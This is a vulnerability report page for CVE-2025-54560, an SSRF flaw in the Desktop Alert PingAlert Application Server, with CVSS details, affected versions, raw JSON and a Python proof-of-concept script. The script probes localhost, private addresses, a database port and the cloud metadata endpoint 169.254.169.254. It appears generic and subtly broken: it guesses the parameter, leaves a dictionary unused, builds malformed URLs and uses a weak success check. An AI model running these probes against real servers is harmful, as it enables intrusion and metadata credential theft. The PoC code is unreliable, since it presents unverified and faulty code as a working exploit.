Security Vulnerability Report
中文
CVE-2025-54560 CVSS 3.8 LOW

CVE-2025-54560

Published: 2025-11-14 18:15:49
Last Modified: 2025-11-20 14:48:50

Description

A Server-side Request Forgery vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Probing of internal infrastructure.

CVSS Details

CVSS Score
3.8
Severity
LOW
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:* - VULNERABLE
Desktop Alert PingAlert 6.1.0.11
Desktop Alert PingAlert 6.1.0.12
Desktop Alert PingAlert 6.1.0.13
Desktop Alert PingAlert 6.1.1.0
Desktop Alert PingAlert 6.1.1.1
Desktop Alert PingAlert 6.1.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-54560 SSRF PoC for Desktop Alert PingAlert # Target: Desktop Alert PingAlert Application Server # Versions: 6.1.0.11 to 6.1.1.2 def test_ssrf(target_url, internal_target): """ Test for SSRF vulnerability by making the server request internal resources """ # Construct the malicious request # The vulnerable parameter may vary - adjust based on actual endpoint exploit_params = { 'url': internal_target, 'callback': internal_target, 'redirect': internal_target } # Try different attack vectors attack_vectors = [ # Localhost probe f"{internal_target}://127.0.0.1:80/test", # Internal network probe f"{internal_target}://192.168.1.1:80/test", # Cloud metadata endpoint "http://169.254.169.254/latest/meta-data/", # Internal service scan f"{internal_target}://10.0.0.1:3306/test" ] for vector in attack_vectors: try: # Send the malicious request response = requests.post( target_url, data={'url': vector}, timeout=10, allow_redirects=False ) # Check for SSRF indicators if response.status_code != 400: print(f"[+] Potential SSRF detected with vector: {vector}") print(f"[+] Response: {response.text[:200]}") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve-2025-54560_poc.py <target_url> <internal_target>") print("Example: python cve-2025-54560_poc.py http://target.com/pingalert http://") sys.exit(1) target = sys.argv[1] internal = sys.argv[2] print(f"[*] Testing SSRF on {target}") print(f"[*] Internal target: {internal}") result = test_ssrf(target, internal) if result: print("[!] Vulnerability confirmed!") else: print("[-] No SSRF detected or target not vulnerable")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-54560", "sourceIdentifier": "[email protected]", "published": "2025-11-14T18:15:49.390", "lastModified": "2025-11-20T14:48:49.703", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Server-side Request Forgery vulnerability was found in the Application Server of Desktop Alert PingAlert version 6.1.0.11 to 6.1.1.2 which allows Probing of internal infrastructure."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:N", "baseScore": 3.8, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.2, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:desktopalert:pingalert_application_server:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0.11", "versionEndExcluding": "6.1.1.5", "matchCriteriaId": "35DFA98A-F509-4F93-99A3-807C4B6548A2"}]}]}], "references": [{"url": "https://desktopalert.net", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://desktopalert.net/cve-2025-54560/", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}